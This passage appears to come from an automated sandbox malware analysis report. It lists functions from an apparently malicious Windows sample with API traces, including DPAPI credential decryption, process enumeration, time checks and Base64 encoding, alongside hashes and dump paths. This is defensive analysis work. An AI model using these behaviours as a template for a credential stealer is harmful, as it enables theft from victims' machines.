                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #rr_$$Ug]$*G}$<tf$Iao$^z]
                        • API String ID: 0-3992705258
                        • Opcode ID: d7bcdc73477f3206fbd3bf4e835451b29a4be0b092b78b85ed0a2f224d11d6af
                        • Instruction ID: 027dbbd743cc2e04e3ced7c3c17c7bf4d400e735dc3cd3666436bd5a16a0d8de
                        • Opcode Fuzzy Hash: d7bcdc73477f3206fbd3bf4e835451b29a4be0b092b78b85ed0a2f224d11d6af
                        • Instruction Fuzzy Hash: ACB2F6F390C204AFE7046E2DEC8567AFBE5EF94220F1A4A3DEAC4C3744E67558058697
                        Function 00CB9AB1 Relevance: 9.1, Strings: 6, Instructions: 1634COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &Hp'$.T?_$K&1o$u}_u$~#W?$%sW
                        • API String ID: 0-3163407309
                        • Opcode ID: 714105b66ddade1817e34ef1ed5e639e231ee0f938e6f949beeeb857fdbac938
                        • Instruction ID: 6b4b618ef9603ae78027f51efa8cd2363ed251d0d04449ba2ce1aee80856664f
                        • Opcode Fuzzy Hash: 714105b66ddade1817e34ef1ed5e639e231ee0f938e6f949beeeb857fdbac938
                        • Instruction Fuzzy Hash: 31B22AF3A0C204AFE304AE2DEC8577AB7E9EF94720F1A853DE6C4C7744E63558058696
                        Function 00CC3ACB Relevance: 9.1, Strings: 6, Instructions: 1570COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )3^$7p?$T%{$T%{$e_O$k~~w
                        • API String ID: 0-3086935203
                        • Opcode ID: 45217cce17f9277a68b12e0f71c1b1de8361bd85141cb1cd7c8ea2f3da60d11c
                        • Instruction ID: cd1f451af1829f5518995c3c4e965fa6ae36b1948d497dc13c61c6d81e12692c
                        • Opcode Fuzzy Hash: 45217cce17f9277a68b12e0f71c1b1de8361bd85141cb1cd7c8ea2f3da60d11c
                        • Instruction Fuzzy Hash: 6CB2E5F3A0C2009FE7086E2DEC8577ABBE9EB94320F1A453DE6C5C7744EA3558058697
                        Function 00922C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00922C58
                        • wsprintfA.USER32 ref: 00922C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 6f1ce890aa9549b5d541b8fac72d2e40023153d7a4ce4af3c47b5f9b8bf9adef
                        • Instruction ID: 2d1b32427a0666b4b2ba5f3be01eaa42e9bdec4ace2a46d76c6f557231e9c9ca
                        • Opcode Fuzzy Hash: 6f1ce890aa9549b5d541b8fac72d2e40023153d7a4ce4af3c47b5f9b8bf9adef
                        • Instruction Fuzzy Hash: 45012671A04614BBCB1C9F58DC4AF6EBB6DEB84721F104369F916DB3C0DBB419008AD2
                        Function 00CB6542 Relevance: 7.8, Strings: 5, Instructions: 1550COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: =6?U$X(wk$tw-$5rW$k;W
                        • API String ID: 0-806636559
                        • Opcode ID: 4de8c01ecc27c735a1a03822ec4f70ce098239cab38657dcdd2e07573a948e91
                        • Instruction ID: 3601fea0f214eee60eaf2fb3f3b6bbc44745653fefcb5f64e085d9e51f868198
                        • Opcode Fuzzy Hash: 4de8c01ecc27c735a1a03822ec4f70ce098239cab38657dcdd2e07573a948e91
                        • Instruction Fuzzy Hash: 7DB2F5F360C2009FE7046E2DEC8567ABBE9EF94320F164A3DEAC5C7744EA3558418697
                        Function 00921B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00921B72
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092184F
                          • Part of subcall function 00921820: lstrlen.KERNEL32(015D7010), ref: 00921860
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 00921887
                          • Part of subcall function 00921820: lstrcat.KERNEL32(00000000,00000000), ref: 00921892
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 009218C1
                          • Part of subcall function 00921820: lstrlen.KERNEL32(00934FA0), ref: 009218D3
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 009218F4
                          • Part of subcall function 00921820: lstrcat.KERNEL32(00000000,00934FA0), ref: 00921900
                          • Part of subcall function 00921820: lstrcpy.KERNEL32(00000000,00000000), ref: 0092192F
                        • sscanf.NTDLL ref: 00921B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00921BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00921BC6
                        • ExitProcess.KERNEL32 ref: 00921BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        • Opcode ID: 3d04100d58e30fc383966f1b38ebe69aa1e268b4ca4b30d984eedca6c34fbdab
                        • Instruction ID: 45524455dbe1ee2cd4d9c7f7dd8955aba2b6538e038290d87576cab498cde87a
                        • Opcode Fuzzy Hash: 3d04100d58e30fc383966f1b38ebe69aa1e268b4ca4b30d984eedca6c34fbdab
                        • Instruction Fuzzy Hash: 7F21E2B1518301AF8354DF69E88585FBBF8EED8214F509A1EF599C3264EB70D5088BA2
                        Function 00907750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0090775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00907765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0090778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009077AD
                        • LocalFree.KERNEL32(?), ref: 009077B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 6813467a471e6a16a91ae883d5ed2b4ca3ada515e0c5325e445f67fe7642b6ac
                        • Instruction ID: e29a4ccb04d86482b8de95fbc65e552cb7e627681cf728fad2d30e8ffe1165ef
                        • Opcode Fuzzy Hash: 6813467a471e6a16a91ae883d5ed2b4ca3ada515e0c5325e445f67fe7642b6ac
                        • Instruction Fuzzy Hash: 58011E75B44318BBEB14DB949C4AFAE7B78EB44B11F104155FA09EB2C0DAB0A9008B90
                        Function 00CB49BA Relevance: 6.6, Strings: 4, Instructions: 1626COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;zo$bKu$|=w$?
                        • API String ID: 0-3184116080
                        • Opcode ID: 97644243c79ae4a63060515e6c97d76fd2eed15d5a754187bfff63f8313bf31f
                        • Instruction ID: fa6fa37fafe3e637745932e56cfea75dee18848edbb21b58fb1ee32d72b236ab
                        • Opcode Fuzzy Hash: 97644243c79ae4a63060515e6c97d76fd2eed15d5a754187bfff63f8313bf31f
                        • Instruction Fuzzy Hash: 4AB206F3A082049FE314AE2DEC8577AFBE9EF94720F1A453DEAC4C3744E53598058696
                        Function 00923A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00923A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00923AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00923ABF
                          • Part of subcall function 00927310: lstrlen.KERNEL32(------,00905BEB), ref: 0092731B
                          • Part of subcall function 00927310: lstrcpy.KERNEL32(00000000), ref: 0092733F
                          • Part of subcall function 00927310: lstrcat.KERNEL32(?,------), ref: 00927349
                          • Part of subcall function 00927280: lstrcpy.KERNEL32(00000000), ref: 009272AE
                        • CloseHandle.KERNEL32(00000000), ref: 00923BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 97cf7aabf94d408b79abf50960994e605be8d8dd3ecf1302032569b23d0c636f
                        • Instruction ID: cb0cad70d27a2538fc3e326ad5ab178ed365e1a4b36fbc3c9706c9590a896691
                        • Opcode Fuzzy Hash: 97cf7aabf94d408b79abf50960994e605be8d8dd3ecf1302032569b23d0c636f
                        • Instruction Fuzzy Hash: 78810930904224DFC714CF19E948BA5B7F5FB44315F29C1A9D409AB2B6D77A9D86CF80
                        Function 0090EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0090EA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0090EA7E
                        • lstrcat.KERNEL32(0092CFEC,0092CFEC), ref: 0090EB27
                        • lstrcat.KERNEL32(0092CFEC,0092CFEC), ref: 0090EB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 2305b5c6841e12ee178d35e2e9a5af056e98817538e8f8510abb79fc9ae2e773
                        • Instruction ID: a37cb735e1b565599bb30ba355d8c7ba6e7aa6044d709a7113fa1dd7c6f67945
                        • Opcode Fuzzy Hash: 2305b5c6841e12ee178d35e2e9a5af056e98817538e8f8510abb79fc9ae2e773
                        • Instruction Fuzzy Hash: F231A475A00229ABDB109B99EC45FEFB77DDF84705F1441A5FA09E3280DBB45A04CBA2
                        Function 009240B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009240CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009240DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009240E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00924113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
